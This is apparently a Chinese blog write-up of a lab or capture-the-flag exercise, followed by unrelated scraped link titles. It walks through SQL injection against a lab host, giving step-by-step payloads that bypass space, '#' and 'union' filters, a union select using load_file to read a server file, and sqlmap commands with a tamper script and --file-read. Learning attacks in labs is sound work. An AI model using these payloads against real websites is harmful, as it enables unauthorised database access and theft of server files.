当前位置: 首页 > news >正文

张裕网站建设的目标我的家乡网站建设模板

张裕网站建设的目标,我的家乡网站建设模板,wordpress 汉化软件,做返利网站能赚钱的url:http://192.168.154.253:81/ #打开http://XXX:81/,XXX为靶机的ip地址 审题 1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中 2、开始答题 发现这里url中有一个id的参数&#xff0…

url:http://192.168.154.253:81/  #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中

2、开始答题

发现这里url中有一个id的参数,并且给出了当前所执行的sql语句

第一步:判断注入点

1、?id=1'

2、?id=1'and'1'='1

第二步:判断语句模板

1、使用 order by 判断语句模板列数

发现语句在执行中过滤了空格还过滤了“#”

执行失败:

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

执行成功:

?id=1')and'1'='1'order/**/by/**/3%23

解释:

?id=1')and'1'='1'order/**/by/**/3%23

  • ')用来闭合前面的语句,order/**/by/**/3%23(order by 3)用来查询模板列数
  • /**/(用注释的方式代替空格),%23(使用url编码代替#

2、判断出语句模板有4个字段

回显正常:

?id=1')and'1'='1'order/**/by/**/4%23  #执行 order by 4 的时候回显正常

回显不正常:

?id=1')and'1'='1'order/**/by/**/5%23  #执行 order by 5 的时候回显不正常

第三步:找回显点

回显不正常:

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路:使用 and 1=2 报错找回显点

回显正常:

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路:由于过滤了union,所以这里使用双写的方式经行过滤绕过,并且判断出回显点有3个(语句模板中的234位置均为回显点)

第四步:拿到flag

执行成功:

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解释:

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

  • database() #当前数据库名
  • user() #当前数据库用户名
  • load_file('/tmp/360/key') #读取服务器文件

扩展:使用sqlmap一把梭哈

1、由于前面判断出了此题注入点存在过滤空格的情况,所以在使用sqlmap的时候需要指定脚本(用注释/**/替换空格字符' ':--tamper "space2comment.py")运行

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py"

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  

2、获取到flag

http://www.yayakq.cn/news/205056/

相关文章:

  • 网站排版用什么软件做微信封面模板下载网站
  • 百斯特网站建设阳山县网站住房和建设局
  • 建网站需要软件PHP网站开发与管理设计心得
  • 特色的合肥网站建设郴州网站建设哪家比较好
  • php网站开发实例电子版wordpress 发送邮件
  • 设计找图网站做做网页
  • 微网站建设企划书尤溪建设局网站
  • 网站开发第三方登录设计wordpress 自动采集插件
  • 给人做logo的网站仿门户网站源码
  • 网站空间后台网站更改模板 seo
  • 普陀集团网站建设学校的网站是怎么建设的
  • 淘宝联盟做网站wordpress打不开仪表盘
  • 合肥企业网站建设专家中南路网站建设公司
  • 绵阳低价网站建设网站弹窗特效
  • 爱站工具有加超人下拉系统深圳专业营销网站公司
  • 给企业做网站 工作网站开发环境的配置
  • 各家建站平台要建设一个网站需要准备些什么
  • 行业电子网站建设小程序推广方式有哪些
  • 免费行情网站软件淘宝店铺买卖
  • 如何建设网站功能设计公文写作网站
  • 免费网站一级a做爰在免费线看工信部门备案网站
  • 中山企业手机网站建设建筑工程招标
  • 那些网站做的比较好东莞市正度网络科技有限公司
  • 网站后台排版厦门过路费网站
  • 工程建设与设计期刊网站wordpress检测不到更新
  • 建设银行企业网站失败商务网站开发公司
  • 做网站哪家好 要钱包括哪些内容
  • 怎样做网站的外链开发公司成本管理
  • 巴南区网站建设代理服务器软件
  • 网站域名列表是什么易游网络验证代理平台